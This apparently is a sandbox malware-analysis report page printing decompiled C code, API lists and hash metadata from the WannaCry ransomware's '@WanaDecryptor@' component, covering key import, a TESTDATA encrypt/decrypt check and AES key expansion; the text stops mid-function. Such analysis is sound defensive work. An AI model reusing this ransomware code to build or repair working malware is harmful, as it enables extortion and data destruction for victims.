                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                  0x004047c3
                                  0x004047c5
                                  0x004047ca
                                  0x004047d5
                                  0x004047d6
                                  0x004047e6
                                  0x004047e8
                                  0x004047ee
                                  0x004047f3
                                  0x004047f9
                                  0x004047ff
                                  0x00404805
                                  0x0040480b
                                  0x00404811
                                  0x00404818
                                  0x0040482c
                                  0x0040482c
                                  0x0040482e
                                  0x00404830
                                  0x0040483c
                                  0x00404841
                                  0x00404850
                                  0x004048f3
                                  0x004048f8
                                  0x00404905
                                  0x00404856
                                  0x00404856
                                  0x00404869
                                  0x0040486e
                                  0x00404873
                                  0x00404995
                                  0x00404995
                                  0x0040499a
                                  0x00000000
                                  0x00404879
                                  0x0040487c
                                  0x00404885
                                  0x0040488a
                                  0x0040488f
                                  0x00000000
                                  0x00404895
                                  0x004048a6
                                  0x004048a8
                                  0x004048ae
                                  0x004048b2
                                  0x004048bc
                                  0x004048bc
                                  0x004048be
                                  0x004048c9
                                  0x004048d0
                                  0x004048d1
                                  0x004048d3
                                  0x004048d5
                                  0x004048da
                                  0x004048e3
                                  0x0040491c
                                  0x00404928
                                  0x0040493d
                                  0x0040495c
                                  0x00404984
                                  0x0040498b
                                  0x00000000
                                  0x0040495e
                                  0x0040495e
                                  0x00404963
                                  0x00404964
                                  0x00404974
                                  0x00404981
                                  0x00404981
                                  0x0040492a
                                  0x0040492a
                                  0x0040492f
                                  0x00000000
                                  0x0040492f
                                  0x004048e5
                                  0x004048e5
                                  0x004048ea
                                  0x004048eb
                                  0x004048eb
                                  0x00000000
                                  0x004048f0
                                  0x004048e3
                                  0x0040488f
                                  0x00404873

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E,00000001,?,0019FA30), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,?,0019FA30), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?,?,?,?,?,00000001,?,0019FA30), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                  0x004049b3
                                  0x004049b5
                                  0x004049ba
                                  0x004049c5
                                  0x004049c6
                                  0x004049d3
                                  0x004049dc
                                  0x004049df
                                  0x004049e2
                                  0x004049fb
                                  0x004049fd
                                  0x00404a03
                                  0x00404ac1
                                  0x00404ac1
                                  0x00000000
                                  0x00404a09
                                  0x00404a0b
                                  0x00404a11
                                  0x00404a13
                                  0x00404a19
                                  0x00404a2b
                                  0x00404a40
                                  0x00404a42
                                  0x00404a47
                                  0x00000000
                                  0x00404a49
                                  0x00404a5a
                                  0x00404a75
                                  0x00404a7d
                                  0x00404a7f
                                  0x00404ac3
                                  0x00404ac6
                                  0x00000000
                                  0x00404a81
                                  0x00404a84
                                  0x00404a85
                                  0x00404a95
                                  0x00404aa2
                                  0x00404aa2
                                  0x00404a5c
                                  0x00404a5c
                                  0x00404a61
                                  0x00000000
                                  0x00404a61
                                  0x00404a5a
                                  0x00404a2d
                                  0x00404a2d
                                  0x00404a32
                                  0x00000000
                                  0x00404a32
                                  0x00404a1b
                                  0x00404a1b
                                  0x00404a1f
                                  0x00404ac7
                                  0x00404ac7
                                  0x00404ad4
                                  0x00404ae1
                                  0x00404ae1
                                  0x00404a19

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                  0x0040a15a
                                  0x0040a15c
                                  0x0040a167
                                  0x0040a16f
                                  0x0040a179
                                  0x0040a17e
                                  0x0040a17f
                                  0x0040a17f
                                  0x0040a184
                                  0x0040a18b
                                  0x0040a1a0
                                  0x0040a1a8
                                  0x0040a1ae
                                  0x0040a1b2
                                  0x0040a1b7
                                  0x0040a1b8
                                  0x0040a1b8
                                  0x0040a1bd
                                  0x0040a1c4
                                  0x0040a1d4
                                  0x0040a1dd
                                  0x0040a1e1
                                  0x0040a1eb
                                  0x0040a1f0
                                  0x0040a1f1
                                  0x0040a1f1
                                  0x0040a1f7
                                  0x0040a201
                                  0x0040a208
                                  0x0040a20b
                                  0x0040a20d
                                  0x0040a213
                                  0x0040a216
                                  0x0040a225
                                  0x0040a229
                                  0x0040a22f
                                  0x0040a239
                                  0x0040a239
                                  0x0040a23b
                                  0x0040a244
                                  0x0040a272
                                  0x0040a27b
                                  0x0040a289
                                  0x0040a28e
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a291
                                  0x0040a246
                                  0x0040a249
                                  0x0040a262
                                  0x0040a26a
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a249
                                  0x0040a29d
                                  0x0040a2a3
                                  0x0040a2ad
                                  0x0040a2b2
                                  0x0040a2b6
                                  0x0040a2d7
                                  0x0040a2dd
                                  0x0040a2e1
                                  0x0040a305
                                  0x0040a312
                                  0x0040a312
                                  0x0040a318
                                  0x0040a319
                                  0x0040a31f
                                  0x0040a327
                                  0x0040a32b
                                  0x0040a330
                                  0x0040a334
                                  0x0040a36e
                                  0x0040a36e
                                  0x0040a372
                                  0x0040a3cf
                                  0x0040a3d1
                                  0x0040a576
                                  0x0040a57c
                                  0x0040a583
                                  0x0040a587
                                  0x0040a5f3
                                  0x0040a5f5
                                  0x0040a5fe
                                  0x0040a5fe
                                  0x0040a589
                                  0x0040a589
                                  0x0040a58f
                                  0x0040a591
                                  0x00000000
                                  0x00000000
                                  0x0040a593
                                  0x0040a595
                                  0x0040a597
                                  0x0040a597
                                  0x0040a59b
                                  0x0040a5a5
                                  0x0040a5d3
                                  0x0040a5d4
                                  0x0040a5d4
                                  0x0040a5d9
                                  0x0040a5dd
                                  0x0040a5e7
                                  0x0040a5e8
                                  0x0040a5ed
                                  0x0040a5ed
                                  0x00000000
                                  0x0040a58f
                                  0x0040a3d7
                                  0x0040a3df
                                  0x0040a3e8
                                  0x0040a446
                                  0x0040a44c
                                  0x0040a450
                                  0x0040a478
                                  0x0040a478
                                  0x0040a47e
                                  0x0040a483
                                  0x0040a48a
                                  0x0040a48c
                                  0x0040a48f
                                  0x0040a48f
                                  0x0040a49a
                                  0x0040a4e0
                                  0x0040a4ec
                                  0x0040a4f2
                                  0x0040a4f2
                                  0x0040a4f8
                                  0x0040a4ff
                                  0x0040a501
                                  0x0040a504
                                  0x0040a504
                                  0x0040a507
                                  0x0040a509
                                  0x0040a511
                                  0x00000000
                                  0x00000000
                                  0x0040a513
                                  0x0040a513
                                  0x0040a519
                                  0x0040a51d
                                  0x0040a523
                                  0x00000000
                                  0x00000000
                                  0x0040a527
                                  0x0040a529
                                  0x0040a52c
                                  0x0040a52f
                                  0x0040a533
                                  0x0040a534
                                  0x0040a53b
                                  0x0040a545
                                  0x0040a555
                                  0x0040a556
                                  0x0040a559
                                  0x0040a560
                                  0x0040a564
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a564
                                  0x00000000
                                  0x0040a519
                                  0x0040a455
                                  0x00000000
                                  0x00000000
                                  0x0040a45b
                                  0x0040a45b
                                  0x0040a461
                                  0x0040a464
                                  0x0040a46b
                                  0x0040a46d
                                  0x0040a470
                                  0x0040a470
                                  0x00000000
                                  0x0040a566
                                  0x0040a56a
                                  0x0040a56e
                                  0x00000000
                                  0x0040a3df
                                  0x0040a374
                                  0x0040a37a
                                  0x0040a37e
                                  0x0040a388
                                  0x0040a38b
                                  0x0040a38f
                                  0x0040a390
                                  0x0040a392
                                  0x0040a39f
                                  0x0040a3af
                                  0x0040a3b3
                                  0x0040a3bc
                                  0x0040a3c3
                                  0x0040a3c9
                                  0x0040a3cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a3cd
                                  0x00000000
                                  0x0040a37e
                                  0x0040a336
                                  0x0040a33a
                                  0x0040a33c
                                  0x0040a344
                                  0x0040a34f
                                  0x0040a366
                                  0x0040a367
                                  0x0040a368
                                  0x0040a368
                                  0x00000000
                                  0x0040a33a
                                  0x0040a2e3
                                  0x0040a2e3
                                  0x0040a2e9
                                  0x0040a2eb
                                  0x0040a2f1
                                  0x0040a2f1
                                  0x0040a2f3
                                  0x0040a2f3
                                  0x0040a2fd
                                  0x0040a2fe
                                  0x0040a301
                                  0x00000000
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2bb
                                  0x0040a2bd
                                  0x0040a2c3
                                  0x0040a2c3
                                  0x0040a2c5
                                  0x0040a2c5
                                  0x0040a2cf
                                  0x0040a2d0
                                  0x0040a2d3
                                  0x00000000
                                  0x0040a2bb

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
